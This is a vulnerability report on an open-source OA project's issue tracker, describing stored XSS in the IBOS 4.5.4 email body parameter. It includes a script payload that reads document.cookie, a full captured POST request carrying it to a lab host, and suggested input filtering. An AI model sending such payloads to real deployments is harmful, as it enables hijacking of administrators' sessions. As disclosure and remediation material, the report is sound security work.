677 Star 1.9K Fork 927

IBOS开源OA协同办公管理 / IBOS

 / 详情

Email function has XSS vulnerability in emailbody[content] parameter

已完成
创建于  
2020-01-12 23:04

Test environment

os: windows
IBOS version: 4.5.4
Discovery time: 2020/1/12
download IBOS time: 2020/1/9

Testing process

create new user

Create a new account test1 with normal user permissions

test-1

login in the test1 and enter the email.

test-2

Send email

Send email to Super Administrator

test-3

Perform packet capture to modify the content sent,modify the emailbody[content] parameter value and add the payload like <script>alert(document.cookie)</script> and "Forward" it.

test-3

payload

<script>alert(document.cookie)</script>

and the test packet is like this.

POST /?r=email/content/add HTTP/1.1
Host: 192.168.126.141:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 423
Origin: [http://192.168.126.141:8090](http://192.168.126.141:8090)
Connection: close
Referer: [http://192.168.126.141:8090/?r=email/content/add](http://192.168.126.141:8090/?r=email/content/add)
Cookie: JV66_saltkey=R62zxTJ6; PHPSESSID=gsbu4no765jlira852mg7mp2b0; JV66_sid=K5NrmE; lastautologin=0; JV66_lastactivity=1578840035; JV66_ulastactivity=bd03C060mWlgg1zpb4SMJXTC9%2FA1PYx734o%2BZjxQ8U7Cnun%2FGGM0; JV66_lately.SelectBox=u_1; JV66_creditremind=0D0D2D1D0D0D5; JV66_creditbase=0D0D4D1D0D0; JV66_creditrule=%E5%86%99%E9%82%AE%E4%BB%B6; JV66_dropnotify=%7B%22user%22%3A%221%22%2C%22unread_notify%22%3A1%2C%22unread_atme%22%3A0%2C%22unread_comment%22%3A0%2C%22unread_message%22%3A0%2C%22new_folower_count%22%3A0%2C%22unread_total%22%3A1%7D
Upgrade-Insecure-Requests: 1

emailbody%5Btoids%5D=u_1&emailbody%5BisOtherRec%5D=0&emailbody%5BisWebRec%5D=0&emailbody%5Bcopytoids%5D=&emailbody%5Bsecrettoids%5D=&emailbody%5Bimportant%5D=0&emailbody%5Bsubject%5D=aaaaaaaaaaaaaaaaa&file=&emailbody%5Battachmentid%5D=&emailbody%5Bissend%5D=1&op=new&backurl=http%3A%2F%2F192.168.126.141%3A8090%2F%3Fr%3Demail%2Flist%2Findex&formhash=0ea1467f&emailbody%5Bcontent%5D=%3Cp%3Eaaassssssssss%3Cbr%2F%3E%3C%2Fp%3E<script>alert(document.cookie)</script>

Login super managger

login the super manager and receive the email

test-5

look the email content and it will run evil javascript code.Then it will show the cookie value

test-6

Solution

filter or encode special characters like this

<
>
"
'
&
%
... ...

and filter some keyword like this


script
javascript

... ...

or filter some label function which can run javascript like this

onclick
onerror
onload
... ...

评论 (0)

c0d1M4x 创建了任务
c0d1M4x 修改了标题
c0d1M4x 修改了描述
seekArt 任务状态从 待办的 修改为进行中
seekArt 任务状态从 进行中 修改为已完成
展开全部操作日志

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(1)
PHP
1
https://gitee.com/ibos/IBOS.git
git@gitee.com:ibos/IBOS.git
ibos
IBOS
IBOS

搜索帮助